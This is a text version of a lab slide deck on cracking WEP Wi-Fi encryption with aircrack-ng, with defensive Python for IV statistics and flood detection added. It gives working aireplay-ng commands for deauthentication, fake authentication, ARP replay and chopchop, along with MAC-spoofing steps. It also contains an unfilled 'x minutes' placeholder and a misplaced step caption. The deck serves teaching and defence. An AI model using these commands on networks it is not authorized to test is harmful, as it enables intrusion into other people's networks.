WEP Crack Using aircrack-ng

Arunabh Das

Content

Part 1 - Background
  WEP
    Encryption
    Authentication
    Vulnerabilities
Part 2 - Attack Experiment
  Cracking WEP Keys
    Test Environment
      Network Topology
      Hardware & Software
    The Attack
    Observations
Part 3 - Conclusion
  Problems Encountered
  Detection & Prevention
  Conclusion
  References

WEP Encryption
- Wired Equivalent Privacy
- 64-bit and 128-bit keys (of which 24 bits are the IV)
- Utilizes RC4 (encryption) and CRC32 (integrity check)

WEP Authentication
- Open System Authentication

Source - http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html

WEP Authentication
- Shared Key Authentication

Source - http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html

WEP Vulnerability
- Static keys
- Short IV (24 bits)
- Susceptible to statistical-analysis-based attacks
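To put a number on "short IV", the following Python is an added example (not part of the original slides) that computes how quickly a 24-bit IV must repeat under the birthday bound and how fast a sequential IV counter wraps. It assumes IVs are drawn uniformly at random, which is the best case for WEP; an IV counter that restarts at zero repeats sooner.

```python
import math

IV_BITS = 24                 # WEP prepends a 24-bit IV to the shared key
IV_SPACE = 1 << IV_BITS      # 16,777,216 distinct IVs, hence distinct keystreams

def iv_reuse_probability(frames: int, iv_space: int = IV_SPACE) -> float:
    """Probability that at least two of `frames` frames share an IV when every
    IV is drawn uniformly at random (the birthday bound; a best case for WEP)."""
    if frames > iv_space:
        return 1.0           # pigeonhole: a repeat is unavoidable
    log_no_repeat = 0.0      # accumulate log P(no repeat) to avoid underflow
    for i in range(frames):
        log_no_repeat += math.log1p(-i / iv_space)
    return 1.0 - math.exp(log_no_repeat)

def frames_until_reuse_probability(target: float, iv_space: int = IV_SPACE) -> int:
    """Smallest frame count at which the IV reuse probability reaches `target`."""
    frames, log_no_repeat = 0, 0.0
    while 1.0 - math.exp(log_no_repeat) < target:
        log_no_repeat += math.log1p(-frames / iv_space)
        frames += 1
    return frames

def expected_iv_collisions(frames: int, iv_space: int = IV_SPACE) -> float:
    """Expected number of frame pairs sharing an IV: C(frames, 2) / iv_space."""
    return frames * (frames - 1) / (2 * iv_space)

def hours_to_exhaust_iv_space(frames_per_second: float, iv_space: int = IV_SPACE) -> float:
    """Time until a sequential IV counter wraps and keystreams start repeating."""
    return iv_space / frames_per_second / 3600

if __name__ == "__main__":
    n50 = frames_until_reuse_probability(0.5)
    print(f"50% chance of an IV repeat after {n50} frames")
    print(f"expected repeated pairs after 100,000 frames: {expected_iv_collisions(100_000):.0f}")
    print(f"sequential IVs wrap after {hours_to_exhaust_iv_space(500):.1f} h at 500 frames/s")
```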

Network Topology
(Diagram: attacker and victim both communicating through the Wireless AP)

H/W and S/W requirements
Victim - OS: Windows XP; NIC: D-Link WUA-2340 USB adaptor; Software: D-Link Wireless Connection Manager
Attacker - OS: Ubuntu 8.04; NIC: iwl4965 / Atheros AR5007 b/g; Software: Kismet, Airodump, Aireplay, Airjack
Wireless AP - Linksys WRT54GL

Types of attacks using aireplay

It currently implements multiple different attacks:
- Attack 0: Deauthentication
- Attack 1: Fake Authentication
- Attack 2: Interactive Packet Replay
- Attack 3: ARP Request Replay Attack
- Attack 4: KoreK Chopchop attack
- Attack 5: Fragmentation attack
- Attack 6: Caffe-latte attack
- Attack 7: Client-oriented fragmentation attack

Source - http://www.aircrack-ng.org/doku.php?id=aireplay-ng

Deauthentication

This attack is a type of "man-in-the-middle" attack which sends disassociation packets to one or more clients currently associated with a particular access point, forcing the client to disconnect from the AP and connect to the cracker's fake AP. The reasons for disassociating clients are:
- Generate ARP requests
- Force clients to re-authenticate
- Recover a hidden ESSID

Deauthentication cont.
Use aireplay to achieve the de-auth attack. Command:

  aireplay-ng -0 1 -a <AP MAC address> -c <client MAC address> ath0

- -0 means deauthentication
- 1 is the number of deauths to send
- -a is the MAC address of the access point
- -c is the MAC address of the client to de-auth
- ath0 is the interface name

Deauthentication cont.
The MAC addresses of the AP and the client can be obtained by sniffing with tools like Wireshark. The output of the command from the slide above will look like:

  11:09:28 Sending DeAuth to station -- STMAC: [00:0F:B5:34:30:30]

STMAC is the MAC address of the client (the client is then de-authenticated, after which the attacker connects using the spoofed victim's address).

Fake authentication

Fake authentication allows the attacker to perform the two types of WEP authentication (open system and shared key) and associate with the AP. Unlike the deauthentication attack, no ARP packets are generated; fake authentication is only useful when the attacker needs an associated MAC address for other packet injection attacks but no client is currently connected to the AP.

Fake authentication cont.

The actual aireplay command:

  aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 -y sharedkeyxor ath0

- -1 means fake authentication
- 0 is the reassociation timing in seconds
- -e teddy is the wireless network name
- -a 00:14:6C:7E:40:80 is the access point MAC address
- -h 00:09:5B:EC:EE:F2 is our card's MAC address
- -y sharedkeyxor is the name of the file containing the PRGA xor bits. This is only used for shared key authentication; open system authentication, which is typical, does not require it. (The PRGA xor bits can be obtained from the de-auth or KoreK chopchop attack.)
- ath0 is the wireless interface name

ARP Request Replay attack

The classic ARP request replay attack is the most effective way to generate new initialization vectors (IVs). The program listens for an ARP packet and then retransmits it back to the access point. This, in turn, causes the access point to repeat the ARP packet with a new IV. The program retransmits the same ARP packet over and over; however, each ARP packet repeated by the access point carries a new IV. It is all these new IVs which allow you to determine the WEP key.

ARP Request Replay attack cont.

Basic usage:

  aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0

Where:
- -3 means standard ARP request replay
- -b 00:13:10:30:24:9C is the access point MAC address
- -h 00:11:22:33:44:55 is the source MAC address (either an associated client or from fake authentication)
- ath0 is the wireless interface name

ARP Request Replay attack cont.

The output of the above command would be:

  Saving ARP requests in replay_arp-0219123051.cap
  You should also start airodump-ng to capture replies.
  Read 11978 packets (got 7193 ARP requests), sent 3902 packets

KoreK chopchop

This attack, when successful, can decrypt a WEP data packet without knowing the key. It can even work against dynamic WEP. This attack does not recover the WEP key itself, but merely reveals the plaintext. Some APs are not vulnerable to this attack.

KoreK chopchop cont.

Perform KoreK chopchop with aireplay:

  aireplay-ng -4 -h 00:09:5B:EC:EE:F2 -b 00:14:6C:7E:40:80 ath0

- -4 means the chopchop attack
- -h 00:09:5B:EC:EE:F2 is the MAC address of an associated client, or your card's MAC if you did fake authentication
- -b 00:14:6C:7E:40:80 is the access point MAC address
- ath0 is the wireless interface name

KoreK chopchop cont.

Sample output of the above command:

  Read 165 packets...
  Size: 86, FromDS: 1, ToDS: 0 (WEP)
  BSSID = 00:14:6C:7E:40:80
  Dest. MAC = FF:FF:FF:FF:FF:FF
  Source MAC = 00:40:F4:77:E5:C9
  0x0000: 0842 0000 ffff ffff ffff 0014 6c7e 4080 .B..........l~@.
  0x0010: 0040 f477 e5c9 603a d600 0000 5fed a222 .@.w..`:...._.."
  0x0020: e2ee aa48 8312 f59d c8c0 af5f 3dd8 a543 ...H......._=..C
  0x0030: d1ca 0c9b 6aeb fad6 f394 2591 5bf4 2873 ....j.....%.[.(s
  0x0040: 16d4 43fb aebb 3ea1 7101 729e 65ca 6905 ..C...>.q.r.e.i.
  0x0050: cfeb 4a72 be46 ..Jr.F
  Use this packet ? y

Fragmentation Attack

This attack, when successful, can obtain 1500 bytes of PRGA (pseudo random generation algorithm) keystream. This attack does not recover the WEP key itself, but merely obtains the PRGA. The PRGA can then be used to generate packets with packetforge-ng, which are in turn used for various injection attacks. It requires at least one data packet to be received from the access point in order to initiate the attack.

KoreK chopchop vs. Fragmentation Attack

Fragmentation attack obtains the full packet length of 1500 bytes of xor, so a packet of any size could be generated, which is sufficient to create an ARP request. It is extremely fast; however, it needs more information, such as the IP address, to launch.

Chopchop attack does not need to know any IP info, but it is much slower and the maximum number of xor bits it recovers is limited.

Flow Chart for Cracking

Source – http://www.aircrack-ng.org/doku.php?id=flowchart#section_7frag_chop-chop_failed

Configuring Environment - Step 1 - Configure Access Point

Set the encryption to WEP and generate keys using passphrase

Configuring Environment - Step 2 - Configure Access Point

Set the SSID and the broadcast channel.

Configuring Environment - Step 3 - Configure Access Point

Set the Authentication type to Auto

Installation - Installation of kismet (Steps 1-7; screenshots only)

Installation - Patching of kernel (Steps 1-55; screenshots, with these captions)
Step 1: Note that the 2.6.24 version of the kernel doesn't contain the modules that we need
Step 2: Install kernel-package libraries
Step 3: Wait for complete installation of kernel-package libraries
Step 4: Download the latest version of the kernel using wget
Step 11 caption (as it appears in the deck): Finding a client that is connected to the AP and client's MAC id

Preparatory - Testing Injection (screenshots, with these captions)
Step 1: Enable card to monitor mode
Step 2: Basic test to determine if card supports injection
Step 3: Check hidden ID or check specific SSID
Step 4: Create 2 virtual wireless interfaces for attack test
Step 5: (screenshot only)

Reconnaissance - Steps 1-9 (screenshots only)

Attack Without Deauth - Steps 1-13 (screenshots only)

Iteration 2 – ARP Request Replay without deauthentication request
Attack Step 1: Taking down the network interface in order to change the MAC
Attack Step 2: Finding a target AP and the channel it is broadcasting on.
Attack Step 3: Finding a client that is connected to the AP and client's MAC id

Iteration 2 – ARP Request Replay with deauthentication request
Attack Step 4: Changing the attacker's MAC id to match client's (Spoofing)
Attack Step 5: Initiating airodump to capture packets, especially weak-IV packets
Attack Step 6: Monitoring airodump to monitor rate of capture
Attack Step 7: Initiate aireplay to inject frames
Attack Step 8: Monitoring number of ARP requests generated
Attack Step 9: Sending de-authentication frames to client

ARP Request Replay Attack Variation 3 (spoofing MAC but no deauth) - Steps 1-22 (screenshots, with these captions)
Step 3: Finding a client that is connected to the AP and client's MAC id
Step 5: Initiating airodump to capture packets, especially weak-IV packets
Step 6: Monitoring airodump to monitor rate of capture
Step 7: Initiate aireplay to inject frames
Step 8: Monitoring number of ARP requests generated
Step 9: Sending de-authentication frames to client
Steps 15-22: Using aircrack-ng to crack

Observations/Conclusion

- WEP is weak and can be cracked easily
- We were able to crack WEP in x minutes
- WEP encrypted networks should be replaced with WPA/WPA2

Detection/Prevention

- When an abnormal number of ARP requests is being made, it may be a sign that a hacker is trying to crack your WEP key
- Careful monitoring and logging of such an event can help administrators detect such an attack.
- Preventing such an attack is near impossible
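As an added defensive example (not part of the original slides), the following Python applies the detection idea above to a constructed capture: it flags any transmitter whose ARP-sized broadcast frames (the traffic an ARP replay multiplies) or deauthentication frames (the deauth attack described earlier, which carries the AP's address as spoofed transmitter) reach a rate threshold inside a sliding window. The fixed ARP frame sizes and the thresholds are assumptions to tune per network; the MAC addresses are the slides' own sample values, and the capture is constructed inline.

```python
from collections import defaultdict, deque
from typing import Iterable, List, NamedTuple

class Frame(NamedTuple):
    ts: float      # capture timestamp in seconds
    kind: str      # "deauth" (management frame) or "data"
    src: str       # transmitter MAC address
    dst: str       # receiver MAC address
    length: int    # frame length in bytes

BROADCAST = "ff:ff:ff:ff:ff:ff"
# Assumption: WEP-encrypted ARP requests have a fixed on-air size (68 bytes,
# 86 with a QoS header); replay tools recognise them the same way.
ARP_SIZES = {68, 86}
# MAC addresses reused from the slides' own examples, purely as sample data.
AP_MAC, CLIENT_MAC, REPLAYER_MAC = "00:13:10:30:24:9c", "00:0f:b5:34:30:30", "00:11:22:33:44:55"

def looks_like_arp_request(f: Frame) -> bool:
    return f.kind == "data" and f.dst.lower() == BROADCAST and f.length in ARP_SIZES

def detect_wep_attack_indicators(frames: Iterable[Frame], window: float = 10.0,
                                 arp_threshold: int = 100, deauth_threshold: int = 5) -> List[str]:
    """Return one alert per source MAC whose ARP-request or deauthentication
    frame count reaches its threshold inside any sliding window of `window` s."""
    recent = defaultdict(deque)   # (kind, src) -> timestamps still inside the window
    alerted, alerts = set(), []
    for f in sorted(frames, key=lambda x: x.ts):
        if f.kind == "deauth":
            key, threshold = ("deauth", f.src), deauth_threshold
        elif looks_like_arp_request(f):
            key, threshold = ("arp", f.src), arp_threshold
        else:
            continue                  # ordinary traffic is not counted
        q = recent[key]
        q.append(f.ts)
        while q and f.ts - q[0] > window:
            q.popleft()               # expire timestamps older than the window
        if len(q) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append(f"{key[0]}: {len(q)} frames from {key[1]} "
                          f"within {window:.0f}s (threshold {threshold})")
    return alerts

def sample_capture() -> List[Frame]:
    """Constructed capture: a quiet client, a replayed ARP burst, a deauth burst."""
    frames = [Frame(1.0 + i, "data", CLIENT_MAC, BROADCAST, 68) for i in range(3)]
    frames += [Frame(0.05 * i, "data", REPLAYER_MAC, BROADCAST, 68) for i in range(150)]
    frames += [Frame(2.0 + 0.1 * i, "deauth", AP_MAC, CLIENT_MAC, 26) for i in range(8)]
    return frames
```

Running `detect_wep_attack_indicators(sample_capture())` yields one ARP alert for the replaying station and one deauth alert, while the quiet client stays silent.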

References
[1] "Aireplay-ng". URL: http://www.aircrack-ng.org/doku.php?id=aireplay-ng
[2] "Computer Security". URL: http://en.wikipedia.org/wiki/Computer_security
[3] "Exploit (computer security)". URL: http://en.wikipedia.org/wiki/Exploit_(computer_security)

Questions?
